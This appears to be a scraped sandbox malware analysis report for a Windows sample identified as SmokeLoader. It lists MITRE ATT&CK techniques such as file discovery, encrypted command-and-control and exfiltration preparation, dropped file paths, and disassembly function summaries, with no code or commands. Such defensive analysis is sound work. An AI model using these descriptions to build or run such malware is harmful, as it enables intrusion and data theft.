Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: SmokeLoader

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\565.exe

C:\Users\user\AppData\Roaming\fgbwcit

C:\Users\user\AppData\Roaming\trbwcit

C:\Users\user\AppData\Roaming\trbwcit:Zone.Identifier

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Windows Analysis Report
file.exe

Function 00415B60 Relevance: 44.0, APIs: 23, Strings: 2, Instructions: 283
filelibrarypipeCOMMON

Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201
nativeCOMMON

Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167
nativeCOMMON

Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162
nativeCOMMON

Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Function 02DBAE2E Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Function 02D8003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Function 00415792 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73
librarymemoryloaderCOMMON

Function 004157E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
librarymemoryloaderCOMMON

Function 02D80E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON